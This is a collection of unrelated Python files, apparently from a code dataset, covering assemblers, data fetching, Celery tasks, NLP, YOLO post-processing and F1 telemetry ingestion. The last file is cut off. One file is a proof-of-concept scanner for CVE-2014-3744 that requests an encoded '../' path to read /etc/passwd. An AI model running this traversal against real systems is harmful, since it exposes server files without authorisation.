qasm_ext = ".txt"

print('Number of arguments:', len(sys.argv), 'arguments.')
print('Argument List:', str(sys.argv))
if len(sys.argv) != 2:
    print("Error: Asm2Mem only receives one arguments as the assembly file.")
    # NOTE(review): a non-zero exit status would be conventional for errors;
    # exit(0) kept for consistency with the script's existing behavior.
    exit(0)

rawinput = sys.argv[1]
print("The file read from the argument is:", rawinput)

asm_name = rawinput
if not os.path.isfile(asm_name):
    print("\tError! The file does not exist")
    # Bug fix: previously execution fell through here and crashed later
    # when the assemblers tried to open the missing file.
    exit(0)
if (asm_name[-len(qasm_ext):] != qasm_ext):
    print("\t Error! The input asm file should have the", qasm_ext,
          "extension. ")
    exit(0)

# Assemble with both implementations and compare their instruction streams.
asm1 = Assembler.Assembler(asm_name)
instructions1 = asm1.convert_to_instructions()
asm2 = old_assembler.Assembler(asm_name)
instructions2 = asm2.convert_to_instructions()
print("compare Result: ", np.array_equal(instructions1, instructions2))
assert(len(instructions1) == len(instructions2))
print("instructions1", '\t', "instructions2")
for i in range(len(instructions1)):
    print(instructions1[i], '\t', instructions2[i])
|
nilq/baby-python
|
python
|
# Read three side lengths from a single input line.
val = input().split()
a, b, c = val
a = float(a)
b = float(b)
c = float(c)
# Triangle inequality: each side must be shorter than the sum of the other two.
# Bug fix: the first condition was `a < (a + b)`, which is always true for
# positive b; it must compare `a` against the OTHER two sides.
if a < (b + c) and b < (c + a) and c < (a + b):
    per = a + b + c
    # NOTE(review): the printed value is the perimeter although the label says
    # "Area" -- confirm against the original problem statement before renaming.
    print('Area = %.2f' % per)
|
nilq/baby-python
|
python
|
import pandas
import numpy
import filepaths
import utils
def fetch_ng_inflation_cpi():
    """Download Nigeria's CPI series and save it as a CSV.

    Reads the workbook URL from the stats metadata, extracts the
    year/month/observation columns, normalises months to 'YYYY-MM' and
    writes the result under ``filepaths.DATA_DIR``.
    """
    stats_metadata = utils.read_stats_metadata()
    url = stats_metadata['NG']['inflation']['CPI']['url']
    tmp_filepath = utils.download_file(url)
    df = pandas.read_excel(tmp_filepath, sheet_name='Table1', header=None)
    # Rows 17..330 hold the data block of the sheet (fixed layout).
    df = df[17:331]
    output_df = pandas.DataFrame({'year': df.iloc[:, 0], 'month': df.iloc[:, 1], 'observation': df.iloc[:, 5]})
    # Forward-fill the year column: the sheet writes the year only on the
    # first month row of each year.
    clean_years = []
    last_year = 0
    for i in output_df.year.to_list():
        if isinstance(i, int):  # was `type(i) == int`; isinstance is idiomatic
            clean_years.append(i)
            last_year = i
        elif pandas.isna(i):
            # Bug fix: `i is numpy.NaN` only matched the numpy singleton by
            # identity; pandas.isna() recognises any missing-value marker.
            clean_years.append(last_year)
    # NOTE(review): a year cell that is neither int nor missing is silently
    # skipped, which would make this assignment fail on a length mismatch --
    # confirm the sheet never contains such values.
    output_df.year = clean_years
    # some months are 3-letter, others are full name – replace with number value
    month_map = {
        'Jan': '01', 'Feb': '02', 'Mar': '03', 'Apr': '04', 'May': '05', 'Jun': '06', 'Jul': '07', 'Aug': '08', 'Sep': '09', 'Oct': '10', 'Nov': '11', 'Dec': '12',
        'January': '01', 'February': '02', 'March': '03', 'April': '04', 'May': '05', 'June': '06', 'July': '07', 'August': '08', 'September': '09', 'October': '10', 'November': '11', 'December': '12',
    }
    output_df.month = output_df.month.map(month_map)
    output_df["month"] = output_df["year"].astype(str) + '-' + output_df["month"]
    output_df.drop('year', axis=1, inplace=True)
    output_filepath = filepaths.DATA_DIR / stats_metadata['NG']['inflation']['CPI']['filename']
    output_df.to_csv(output_filepath, index=False)
# Run the fetch when executed as a script.
if __name__ == '__main__':
    fetch_ng_inflation_cpi()
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
import datetime
# Prefix for every Redis key created to track a pending unique task.
UNIQUE_REDIS_KEY_PREFIX = 'celery_unique'
class UniqueTaskMixin(object):
    """Mixin that adds "unique task" semantics to a Celery task class.

    When configured with a `redis_client` and a callable `unique_key`, and a
    task is scheduled with `eta` or `countdown`, publishing the task first
    revokes any earlier pending task that maps to the same unique key, then
    records the new task id in Redis with a TTL matching its execution time.
    """
    abstract = True       # Celery: do not register this base class as a task
    unique_key = None     # callable mapping task args/kwargs -> unique key suffix
    redis_client = None   # Redis client used to track pending unique tasks

    def apply_async(self, args=None, kwargs=None, task_id=None, producer=None, link=None, link_error=None, **options):
        """Apply tasks asynchronously by sending a message.
        This method serves either as a wrapper for `celery.Task.apply_async()` or, if the task decorator
        was configured with a `redis_client`, callable `unique_key` and `apply_async()` was called with
        either an `eta` or `countdown` argument, the task will be treated as unique. In these cases,
        this method will first revoke any extant task which matches the same unique key configuration
        before proceeding to publish the task. Before returning, a unique task's identifying unique key
        will be saved to Redis as a key, with its task id (provided by the newly-created `AsyncResult` instance)
        serving as the value.
        @see `celery.Task.apply_async()`
        """
        # Unique handling only applies to scheduled (eta/countdown) tasks with
        # both a key generator and a redis client configured.
        should_handle_as_unique_task = (
            callable(self.unique_key)
            and ('eta' in options.keys() or 'countdown' in options.keys())
            and self.redis_client is not None
        )
        if should_handle_as_unique_task:
            # Generate the unique redis key and revoke any task that shares the same key (if one exists)
            unique_redis_key = self._make_redis_key(args, kwargs)
            self._revoke_extant_unique_task_if_exists(unique_redis_key)
        # Pass the task along to Celery for publishing and intercept the AsyncResult return value
        rv = super(UniqueTaskMixin, self).apply_async(args, kwargs, task_id, producer, link, link_error, **options)
        if should_handle_as_unique_task:
            # Create a Redis key/value pair to serve as a tracking record for the newly-created task.
            # The new record will be given a TTL that allows it to expire (approximately) at the same time
            # that the task is executed.
            ttl = self._make_ttl_for_unique_task_record(options)
            self._create_unique_task_record(unique_redis_key, rv.task_id, ttl)
        return rv

    def _make_redis_key(self, callback_args, callback_kwargs):
        """Creates a key used to identify the task's unique configuration in Redis.
        @note All positional arguments and/or keyword arguments sent to the task are applied identically to
            the task's bound `unique_key` callable.
        @param callback_args: The positional arguments which will be passed to the task when it executes
        @type callback_args: list | tuple
        @param callback_kwargs: The keyword arguments which will be passed to the task when it executes
        @type callback_kwargs: dict
        @return: The key which will be used to find any extant version of this task which, if found,
            will by revoked.  Keys are built by using three colon-delimited components:
                1. A global prefix used to identify that the key/value pair in Redis was created to track
                    a unique Celery task (by default, this is "celery_unique")
                2. The name of the task (usually the Python dot-notation path to the function)
                3. The value produced by the `key_generator` callable when supplied with the task's callback
                    arguments.
        @rtype: unicode
        """
        # Get the unbound lambda used to create `self.unique_key` if the inner function exists
        key_generator = self.unique_key.__func__ if hasattr(self.unique_key, '__func__') else self.unique_key
        # Create and return the redis key with the generated unique key suffix
        return '{prefix}:{task_name}:{unique_key}'.format(
            prefix=UNIQUE_REDIS_KEY_PREFIX,
            task_name=self.name,
            unique_key=key_generator(
                *(callback_args or ()),
                **(callback_kwargs or {})
            )
        )

    def _revoke_extant_unique_task_if_exists(self, redis_key):
        """Given a Redis key, deletes the corresponding record if one exists.
        @param redis_key: The string (potentially) used by Redis as the key for the record
        @type redis_key: str | unicode
        """
        task_id = self.redis_client.get(redis_key)
        if task_id is not None:
            # Revoke the pending Celery task, then drop its tracking record.
            self.app.AsyncResult(task_id).revoke()
            self.redis_client.delete(redis_key)

    def _create_unique_task_record(self, redis_key, task_id, ttl):
        """Creates a new Redis key/value pair for the recently-published unique task.
        @param redis_key: The unique key which identifies the task and its configuration (expected to be produced
            by the `UniqueTaskMixin._make_redis_key()` method).
        @type redis_key: str | unicode
        @param task_id: The ID of the recently-published unique task, which will be used as the Redis value
        @param ttl: The TTL for the Redis record, which should be (approximately) equal to the number of seconds
            remaining until the earliest time that the task is expected to be executed by Celery.
        """
        self.redis_client.set(redis_key, task_id, ex=ttl)

    @staticmethod
    def _make_ttl_for_unique_task_record(task_options):
        """Given the options provided to `apply_async()` as keyword arguments, determines the appropriate
        TTL to ensure that a unique task record in Redis expires (approximately) at the same time as the earliest
        time that the task is expected to be executed by Celery.
        The TTL value will be determined by examining the following values, in order of preference:
            - The `eta` keyword argument passed to `apply_async()`, if any.  If this value is found,
              then the TTL will be the number of seconds between now and the ETA datetime.
            - The `countdown` keyword argument passed to `apply_async()`, which will theoretically always
              exist if `eta` was not provided.  If this value is used, the TTL will be equal.
        Additionally, if an `expires` keyword argument was passed, and its value represents (either as an integer
        or timedelta) a shorter duration of time than the values provided by `eta` or `countdown`, the TTL will be
        reduced to the value of `countdown`.
        Finally, the TTL value returned by this method will always be greater than or equal to 1, in order to ensure
        compatibility with Redis' TTL requirements, and that a record produced for a nonexistent task will only
        live for a maximum of 1 second.
        @param task_options: The values passed as additional keyword arguments to `apply_async()`
        @type task_options: dict
        @return: The TTL (in seconds) for the Redis record to-be-created
        @rtype: int
        """
        # Set a default TTL as 1 second (in case actual TTL already occurred)
        ttl_seconds = 1
        option_keys = task_options.keys()
        if 'eta' in option_keys:
            # Get the difference between the ETA and now (relative to the ETA's timezone)
            ttl_seconds = int(
                (task_options['eta'] - datetime.datetime.now(tz=task_options['eta'].tzinfo)).total_seconds()
            )
        elif 'countdown' in option_keys:
            ttl_seconds = task_options['countdown']
        if 'expires' in option_keys:
            if isinstance(task_options['expires'], datetime.datetime):
                # Get the difference between the countdown and now (relative to the countdown's timezone)
                seconds_until_expiry = int(
                    (task_options['expires'] - datetime.datetime.now(tz=task_options['expires'].tzinfo)).total_seconds()
                )
            else:
                seconds_until_expiry = task_options['expires']
            # An earlier expiry wins over the eta/countdown-derived TTL.
            if seconds_until_expiry < ttl_seconds:
                ttl_seconds = seconds_until_expiry
        # Clamp to Redis' minimum TTL of 1 second.
        if ttl_seconds <= 0:
            ttl_seconds = 1
        return ttl_seconds
def unique_task_factory(task_cls):
    """Build an abstract Celery task base class with unique-task handling.

    The returned class mixes :class:`UniqueTaskMixin` into *task_cls*, so
    properly-configured tasks can uniquely exist.

    @param task_cls: The original base class combined with UniqueTaskMixin.
    @type task_cls: type
    @return: A new Celery task base class with unique-task handling mixed in.
    @rtype: type
    """
    bases = (UniqueTaskMixin, task_cls)
    # str() keeps the class name a native str on both Python 2 and 3.
    return type(str('UniqueTask'), bases, {})
|
nilq/baby-python
|
python
|
from . import hist, quality
|
nilq/baby-python
|
python
|
import requests
# Vuln Base Info
def info():
    """Return the static metadata describing this vulnerability and PoC."""
    classification = {
        "cvss-metrics": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "cvss-score": "7.5",
        "cve-id": "CVE-2014-3744",
        "cwe-id": "CWE-22"
    }
    references = [
        "https://nvd.nist.gov/vuln/detail/CVE-2014-3744",
        "https://github.com/advisories/GHSA-69rr-wvh9-6c4q",
        "https://snyk.io/vuln/npm:st:20140206"
    ]
    return {
        "author": "cckuailong",
        "name": '''Node.js st module Directory Traversal''',
        "description": '''A directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary files via a %2e%2e (encoded dot dot) in an unspecified path.''',
        "severity": "high",
        "references": references,
        "classification": classification,
        "metadata": {
            "vuln-target": "",
        },
        "tags": ["cve", "cve2014", "lfi", "nodejs", "st"],
    }
# Vender Fingerprint
def fingerprint(url):
    """Vendor fingerprint stage: no pre-check is implemented, so every target passes."""
    return True
# Proof of Concept
def poc(url):
    """Probe *url* for the st module directory traversal (CVE-2014-3744).

    Sends an encoded ``..`` traversal request for /etc/passwd and checks the
    response body for file contents.

    @param url: Base URL of the target (scheme optional).
    @return: dict that ALWAYS contains "success"; on a hit it also contains
        "info" (vulnerability metadata) and "payload" (the full request URL).
    """
    # Initialise the flag up front: the original only set "success" on the
    # vulnerable path or in the except handler, so a clean non-vulnerable
    # response returned {} and callers indexing result["success"] raised.
    result = {"success": False}
    try:
        url = format_url(url)
        path = '/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
        resp = requests.get(url + path, timeout=10, verify=False, allow_redirects=False)
        if resp.status_code == 200 and "root:" in resp.text:
            result["success"] = True
            result["info"] = info()
            result["payload"] = url + path
    except Exception:
        # Narrowed from a bare except: network errors / timeouts count as
        # "not vulnerable", but KeyboardInterrupt etc. propagate.
        result["success"] = False
    return result
# Exploit, can be same with poc()
def exp(url):
    """Exploit entry point; for this read-only traversal it is identical to poc().

    @param url: Base URL of the target.
    @return: Result dict produced by poc().
    """
    return poc(url)
# Utils
def format_url(url):
    """Normalise a target URL: trim whitespace, default to http://, drop trailing slashes."""
    cleaned = url.strip()
    has_scheme = cleaned.startswith('http://') or cleaned.startswith('https://')
    if not has_scheme:
        cleaned = 'http://' + cleaned
    return cleaned.rstrip('/')
|
nilq/baby-python
|
python
|
__copyright__ = "Copyright 2015 Contributing Entities"
__license__ = """
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from .Assignment import Assignment
from .Error import Error, ConfigurationError
from .FastTrips import FastTrips
from .Logger import FastTripsLogger, setupLogging
from .Passenger import Passenger
from .PathSet import PathSet
from .Performance import Performance
from .Route import Route
from .Run import run_fasttrips, main
from .Stop import Stop
from .TAZ import TAZ
from .Transfer import Transfer
from .Trip import Trip
from .Util import Util
# Public names exported by ``from fasttrips import *``.  Every entry must be
# bound by the imports above: the previous list exported 'Event', which is
# never imported anywhere in this module and made star-imports fail.  The
# other imported public names are now listed too.
__all__ = [
    'Assignment',
    'ConfigurationError',
    'Error',
    'FastTrips',
    'FastTripsLogger', 'setupLogging',
    'Passenger',
    'PathSet',
    'Performance',
    'Route',
    'Run', 'run_fasttrips', 'main',
    'Stop',
    'TAZ',
    'Transfer',
    'Trip',
    'Util',
]
|
nilq/baby-python
|
python
|
import spacy
nlp = spacy.load('en_core_web_sm')
from spacy.matcher import Matcher, PhraseMatcher
from spacy.tokens import Span
import string
from nltk.corpus import stopwords
import pandas as pd
def phrase_template():
    '''
    Return the fixed list of aviation/FAA technical terms used as match patterns.

    The list feeds spaCy's PhraseMatcher in get_relation(); each string becomes
    one pattern.  The list is hand-curated and intentionally broad.

    NOTE(review): the list contains duplicates ("loss", "door", "stall",
    "spiral", "attitude", ...) and apparent typos ("door opeining",
    "instabaility", " Federal Aviation Administration" with a leading space).
    They are preserved here because removing them would change the returned
    value — confirm with the authors before deduplicating.

    @return: list of phrase strings.
    '''
    phrases = ["emergency", "non-normal", " Federal Aviation Administration", "FAA", "Handbook", "emergency landings",
               "engine", "emergency landing", "forced landing", "precautionary landing", "ditching", "fire",
               "sink rate", "sink rate control", "attitude", "terrain selection", "safety concepts", "configuration",
               "approach", "terrain types", "terrain", "confined areas", "trees", "forest", "water", "snow", "after takeoff",
               "engine failure after takeoff", "single engine", "single-engine", "emergency descents", "in-flight", "in-flight fire",
               "engine fire", "electrical fire", "electrical fires", "cabin fire", "asymmetric", "split", "asymmetric flap", "asymmetric (split) flap", "flap", "flaps",
               "malfunction", "flight control malfunction", "flight control malfunctions", "flight control", "total flap failure", "total flaps failure",
               "loss", "loss of elevator control", "elevator", "elevator control", "gear", "landing gear", "landing gear malfunction", "gears", "systems malfunction", "systems malfunctions",
               "electrical", "electrical system", "pitot", "pitot-static", "pitot tube", "blocked", "blockage", "pitot-static system", "instrument operation", "pressure", "pressure chamber",
               "stall", "speed", "vertical speed", "door", "door opening in-flight", "door opeining", "loss", "loss of rpm", "rpm", "loss of manifold pressure", "gain of manifold pressure", "high oil temperature",
               "Inadvertent VFR Flight into IMC", "VFR Flight", "VFR", "control", "maintaining", "airplane control", "maintaining airplane control",
               "attitude", "attitude indicator", "attitude control", "turns", "spiral", "graveyard spiral", "instabaility", "steep", "banks", "steep banks", "climbs", "descents", "maneuvers", "visual flight",
               "extend", "retract", "extension", "retraction", "non-instrument-rated", "pilot", "psychological hazards", "nose", "flying speed", "landing area", "throttle", "runway", "minimum", "touchdown", "glide",
               "damage", "groundspeed", "wind", "deceleration", "hydraulics", "hydraulic", "door", "opening", "spiral", "descent", "EFIS", "avionics", "IFR", "propellor", "thrust", "oil temperature", "oil pressure", "fuel pressure",
               "displays", "flight display", "cowl", "stall", "stall warning", "stall warning horn", "engines", "fuel", "fuel leak", "fuel shortage", "fuel tank", "fuel supply", "fuel selector", ]
    return phrases
def entity_pair(sent):
    '''
    Extract the (subject, object) entity pair from *sent*.

    Walks the dependency parse once, accumulating consecutive ``compound``
    tokens as a prefix and ``*mod`` tokens as a modifier, then attaches them
    to the next subject/object token encountered.

    @param sent: sentence string, parsed with the module-level spaCy model.
    @return: [subject, object]; either element may be "" when not found.
    '''
    ent1 = ""
    ent2 = ""
    prev_token_dep = ""
    prev_token_text = ""
    prefix = ""
    modifier = ""
    for token in nlp(sent):
        if token.dep_ != "punct":
            if token.dep_ == "compound":
                prefix = token.text
                if prev_token_dep == "compound":
                    # Chain consecutive compounds, e.g. "landing gear malfunction".
                    prefix = prev_token_text + " " + token.text
            if token.dep_.endswith("mod"):
                modifier = token.text
                if prev_token_dep == "compound":
                    modifier = prev_token_text + " " + token.text
            # BUGFIX: the original tested ``token.dep_.find("subj") == True``,
            # which compares the substring *index* with True (== 1) and only
            # matched labels like "nsubj" by accident; a substring test is the
            # intended behaviour (same for "obj" below).
            if "subj" in token.dep_:
                ent1 = modifier + " " + prefix + " " + token.text
                prefix = ""
                modifier = ""
                prev_token_dep = ""
                prev_token_text = ""
            if "obj" in token.dep_:
                ent2 = modifier + " " + prefix + " " + token.text
            prev_token_dep = token.dep_
            prev_token_text = token.text
    return [ent1.strip(), ent2.strip()]
def get_relation(sent):
    '''
    Identify the relation phrase in *sent* by matching against the curated
    phrase list from phrase_template().

    @param sent: sentence string, parsed with the module-level spaCy model.
    @return: text of the LAST phrase match in the sentence, or the whole
        sentence when nothing matches (preserving the original fallback).
    '''
    doc = nlp(sent)
    matcher = PhraseMatcher(nlp.vocab)
    pattern = list(nlp.tokenizer.pipe(phrase_template()))
    matcher.add("matching_1", None, *pattern)
    matches = matcher(doc)
    span = doc
    if matches:
        # Only the final match is reported — no need to iterate all of them
        # (the original looped over every match and kept the last; it also
        # computed an unused ``k = len(matches) - 1``).
        _, start, end = matches[-1]
        span = doc[start:end]
    return span.text
def cleanup_text(docs, logging=False):
    '''
    Clean and lemmatize documents: lowercase lemmas, with pronouns, English
    stop words and punctuation removed.

    @param docs: iterable of raw text documents (len() is used for progress).
    @param logging: when True, print progress every 1000 documents.
    @return: pandas Series of cleaned, space-joined token strings.
    '''
    # Build the removal sets once.  The original evaluated
    # stopwords.words('english') inside the comprehension, re-reading the
    # whole NLTK stop-word list for EVERY token — quadratic in practice.
    stop_words = set(stopwords.words('english'))
    punctuation = set(string.punctuation)
    texts = []
    counter = 1
    for doc in docs:
        if counter % 1000 == 0 and logging:
            print("Processed %d out of %d documents." % (counter, len(docs)))
        counter += 1
        doc = nlp(doc, disable=['parser', 'ner'])
        tokens = [tok.lemma_.lower().strip() for tok in doc if tok.lemma_ != '-PRON-']
        tokens = [tok for tok in tokens if tok not in stop_words and tok not in punctuation]
        tokens = ' '.join(tokens)
        texts.append(tokens)
    return pd.Series(texts)
|
nilq/baby-python
|
python
|
# Import the agent class
#from .agenttemplate import AgentTemplate
|
nilq/baby-python
|
python
|
# Copyright © 2020 Arm Ltd and Contributors. All rights reserved.
# SPDX-License-Identifier: MIT
"""
Contains functions specific to decoding and processing inference results for YOLO V3 Tiny models.
"""
import cv2
import numpy as np
def iou(box1: list, box2: list):
    """
    Compute the intersection-over-union (IoU) of two axis-aligned boxes.

    Args:
        box1: First bounding box as [x_min, y_min, x_max, y_max].
        box2: Second bounding box in the same format.

    Returns:
        IoU value in [0, 1]; 0 when either box has non-positive area.
    """
    first_area = (box1[2] - box1[0]) * (box1[3] - box1[1])
    second_area = (box2[2] - box2[0]) * (box2[3] - box2[1])
    if first_area <= 0 or second_area <= 0:
        return 0
    # Overlap extents clamp to zero when the boxes are disjoint.
    overlap_w = min(box1[2], box2[2]) - max(box1[0], box2[0])
    overlap_h = min(box1[3], box2[3]) - max(box1[1], box2[1])
    overlap = max(0, overlap_h) * max(0, overlap_w)
    union = first_area + second_area - overlap
    try:
        return overlap / union
    except ZeroDivisionError:
        return 0
def yolo_processing(output: np.ndarray, confidence_threshold=0.40, iou_threshold=0.40):
    """
    Performs non-maximum suppression on input detections. Any detections
    with IOU value greater than given threshold are suppressed.

    Args:
        output: Vector of outputs from network.
        confidence_threshold: Selects only strong detections above this value.
        iou_threshold: Filters out boxes with IOU values above this value.

    Returns:
        A list of detected objects in the form [class, [box positions], confidence],
        ordered by decreasing confidence.

    Raises:
        RuntimeError: If the model does not produce exactly one output vector.
    """
    if len(output) != 1:
        raise RuntimeError('Number of outputs from YOLO model does not equal 1')
    # Indices of detections whose objectness score clears the threshold
    # (channel 4 of each detection).
    confidence_det = output[0][:, :, 4][0]
    detections = list(np.where(confidence_det > confidence_threshold)[0])
    all_det, nms_det = [], []
    # Create list of all detections above confidence threshold.
    for d in detections:
        box_positions = list(output[0][:, d, :4][0])
        confidence_score = output[0][:, d, 4][0]
        class_idx = np.argmax(output[0][:, d, 5:])
        all_det.append((class_idx, box_positions, confidence_score))
    # Greedy NMS: repeatedly keep the most confident remaining detection and
    # drop everything overlapping it above the IoU threshold.  (The original
    # wrapped the survivors in a redundant copy comprehension inside filter().)
    while all_det:
        best = max(range(len(all_det)), key=lambda i: all_det[i][2])
        nms_det.append(all_det.pop(best))
        kept_box = nms_det[-1][1]
        all_det = [det for det in all_det if iou(det[1], kept_box) <= iou_threshold]
    return nms_det
def yolo_resize_factor(video: cv2.VideoCapture, input_binding_info: tuple):
    """
    Compute the multiplier that scales bounding box positions from model
    input coordinates to their correct position in the source frame.

    Args:
        video: Video capture object, contains information about data source.
        input_binding_info: Contains shape of model input layer.

    Returns:
        Resizing factor to scale box coordinates to output frame size.
    """
    frame_dims = (
        video.get(cv2.CAP_PROP_FRAME_HEIGHT),
        video.get(cv2.CAP_PROP_FRAME_WIDTH),
    )
    # Shape is NHWC; indices 1:3 are (height, width) of the model input.
    model_dims = list(input_binding_info[1].GetShape())[1:3]
    return max(frame_dims) / max(model_dims)
|
nilq/baby-python
|
python
|
from xml.etree.ElementTree import tostring
from f1_telemetry.server import get_telemetry
from kusto.ingest import ingest_kusto
from datetime import datetime
batch_freq_high = 9 # 20 cars per packet * batch_freq_high(x) packets
batch_freq_low = 2
ingest_cartelemetrydataCnt = 0
ingest_cartelemetryBuffer = ""
ingest_sessiondataCnt = 0
ingest_sessiondataBuffer = ""
ingest_lapdataCnt = 0
ingest_lapdataBuffer =""
ingest_carstatusdataCnt =0
ingest_carstatusdataBuffer=""
def ingest_cartelemetrydata(packet, m_header):
    """Buffer one car-telemetry packet as CSV rows and batch-ingest into Kusto.

    One row is appended per car in the packet; the module-level buffer is
    flushed to the "CarTelemetry" table after batch_freq_high + 1 packets.

    @param packet: decoded PacketCarTelemetryData (one entry per car).
    @param m_header: packet header carrying session/frame identity fields.
    """
    #print ("car telemetry length..", len(packet.m_carTelemetryData))
    global ingest_cartelemetryBuffer
    global ingest_cartelemetrydataCnt
    #print ("SUID ", m_header.m_sessionUID)
    for idx,cartelemetrydata in enumerate(packet.m_carTelemetryData):
        data = [
            datetime.utcnow(),  # ingestion timestamp (naive UTC)
            m_header.m_sessionUID,
            m_header.m_frameIdentifier,
            m_header.m_sessionTime,
            m_header.m_playerCarIndex,
            idx,  # car index within the packet
            cartelemetrydata.m_speed,
            cartelemetrydata.m_throttle,
            cartelemetrydata.m_steer,
            cartelemetrydata.m_brake,
            cartelemetrydata.m_clutch,
            cartelemetrydata.m_gear,
            cartelemetrydata.m_engineRPM,
            cartelemetrydata.m_drs,
            cartelemetrydata.m_revLightsPercent,
            '', #cartelemetrydata.m_brakesTemperature fix parse issue
            cartelemetrydata.m_tyresSurfaceTemperature[0],
            cartelemetrydata.m_tyresSurfaceTemperature[1],
            cartelemetrydata.m_tyresSurfaceTemperature[2],
            cartelemetrydata.m_tyresSurfaceTemperature[3],
            cartelemetrydata.m_tyresInnerTemperature[0],
            cartelemetrydata.m_tyresInnerTemperature[1],
            cartelemetrydata.m_tyresInnerTemperature[2],
            cartelemetrydata.m_tyresInnerTemperature[3],
            cartelemetrydata.m_engineTemperature,
            cartelemetrydata.m_tyresPressure[0],
            cartelemetrydata.m_tyresPressure[1],
            cartelemetrydata.m_tyresPressure[2],
            cartelemetrydata.m_tyresPressure[3],
            cartelemetrydata.m_surfaceType[0],
            cartelemetrydata.m_surfaceType[1],
            cartelemetrydata.m_surfaceType[2],
            cartelemetrydata.m_surfaceType[3]
        ]
        ingest_cartelemetryBuffer += ','.join(map(str, data))
        ingest_cartelemetryBuffer +="\n"
    # Flush every batch_freq_high + 1 packets (each packet contributes up to
    # 20 rows, one per car).
    if ingest_cartelemetrydataCnt == batch_freq_high:
        #print(ingest_cartelemetryBuffer)
        ingest_kusto("CarTelemetry", ingest_cartelemetryBuffer )
        ingest_cartelemetryBuffer=""
        ingest_cartelemetrydataCnt=0
    else:
        ingest_cartelemetrydataCnt+=1
def ingest_sessiondata(sessiondatapacket, m_header):
    """Buffer one session packet as a CSV row and batch-ingest into Kusto.

    The module-level buffer is flushed to the "Session" table after
    batch_freq_low + 1 packets, mirroring the other ingest_* helpers.

    @param sessiondatapacket: decoded PacketSessionData.
    @param m_header: packet header carrying session/frame identity fields.
    """
    global ingest_sessiondataBuffer
    global ingest_sessiondataCnt
    data = [
        datetime.utcnow(),  # ingestion timestamp (naive UTC)
        m_header.m_sessionUID,
        m_header.m_frameIdentifier,
        m_header.m_sessionTime,
        m_header.m_playerCarIndex,
        sessiondatapacket.m_weather,
        sessiondatapacket.m_trackTemperature,
        sessiondatapacket.m_airTemperature,
        sessiondatapacket.m_totalLaps,
        sessiondatapacket.m_trackId,
        sessiondatapacket.m_trackLength,
        sessiondatapacket.m_sessionType,
        sessiondatapacket.m_sessionDuration,
        sessiondatapacket.m_sessionTimeLeft
    ]
    # BUGFIX: append with '+=' like the sibling ingest helpers.  The original
    # used '=', overwriting the buffer on every call, so each flush silently
    # dropped all but the most recent packet of the batch.
    ingest_sessiondataBuffer += ','.join(map(str, data))
    ingest_sessiondataBuffer += "\n"
    if ingest_sessiondataCnt == batch_freq_low:
        ingest_kusto("Session", ingest_sessiondataBuffer)
        ingest_sessiondataBuffer = ""
        ingest_sessiondataCnt = 0
    else:
        ingest_sessiondataCnt += 1
def ingest_participantdata(packet, m_header):
    """Ingest every participant record from one packet into Kusto immediately.

    Unlike the telemetry/lap/status helpers, participant data is not batched:
    all rows from the packet are sent in a single ingest call.
    """
    rows = []
    for car_index, participant in enumerate(packet.m_participants):
        fields = [
            datetime.utcnow(),
            m_header.m_sessionUID,
            m_header.m_frameIdentifier,
            m_header.m_sessionTime,
            m_header.m_playerCarIndex,
            car_index,
            packet.m_numActiveCars,
            participant.m_aiControlled,
            participant.m_driverId,
            participant.m_teamId,
            participant.m_raceNumber,
            participant.m_nationality,
            participant.m_name.decode()
        ]
        rows.append(','.join(map(str, fields)) + "\n")
    ingest_kusto("Participant", ''.join(rows))
def ingest_lapdata(packet, m_header):
    """Buffer per-car lap rows as CSV and batch-ingest into Kusto.

    One row is appended per car in the packet; the module-level buffer is
    flushed to the "Lap" table after batch_freq_high + 1 packets.

    @param packet: decoded PacketLapData (one entry per car).
    @param m_header: packet header carrying session/frame identity fields.
    """
    global ingest_lapdataBuffer
    global ingest_lapdataCnt
    for idx,lapdata in enumerate(packet.m_lapsData):
        data = [
            datetime.utcnow(),  # ingestion timestamp (naive UTC)
            m_header.m_sessionUID,
            m_header.m_frameIdentifier,
            m_header.m_sessionTime,
            m_header.m_playerCarIndex,
            idx,  # car index within the packet
            lapdata.m_lastLapTime,
            lapdata.m_currentLapTime,
            lapdata.m_bestLapTime,
            lapdata.m_carPosition,
            lapdata.m_currentLapNum,
            lapdata.m_currentLapInvalid,
            lapdata.m_lapDistance,
            lapdata.m_totalDistance,
            lapdata.m_gridPosition,
            lapdata.m_pitStatus,
            lapdata.m_penalties,
            lapdata.m_driverStatus,
            lapdata.m_resultStatus
        ]
        ingest_lapdataBuffer += ','.join(map(str, data))
        ingest_lapdataBuffer +="\n"
    if ingest_lapdataCnt == batch_freq_high:
        #print(ingest_lapdataBuffer)
        ingest_kusto("Lap", ingest_lapdataBuffer )
        ingest_lapdataBuffer=""
        ingest_lapdataCnt=0
    else:
        ingest_lapdataCnt+=1
def ingest_carstatusdata(packet, m_header):
    """Buffer per-car status rows as CSV and batch-ingest into Kusto.

    One row is appended per car in the packet; the module-level buffer is
    flushed to the "CarStatus" table after batch_freq_high + 1 packets.

    @param packet: decoded PacketCarStatusData (one entry per car).
    @param m_header: packet header carrying session/frame identity fields.
    """
    global ingest_carstatusdataBuffer
    global ingest_carstatusdataCnt
    for idx,carstatusdata in enumerate(packet.m_carStatusData):
        data = [
            datetime.utcnow(),  # ingestion timestamp (naive UTC)
            m_header.m_sessionUID,
            m_header.m_frameIdentifier,
            m_header.m_sessionTime,
            m_header.m_playerCarIndex,
            idx,  # car index within the packet
            carstatusdata.m_tractionControl,
            carstatusdata.m_antiLockBrakes,
            carstatusdata.m_fuelMix,
            carstatusdata.m_fuelInTank,
            carstatusdata.m_fuelCapacity,
            carstatusdata.m_fuelRemainingLaps,
            carstatusdata.m_maxRPM,
            carstatusdata.m_idleRPM,
            carstatusdata.m_maxGears,
            carstatusdata.m_drsAllowed,
            carstatusdata.m_tyresWear[0],
            carstatusdata.m_tyresWear[1],
            carstatusdata.m_tyresWear[2],
            carstatusdata.m_tyresWear[3],
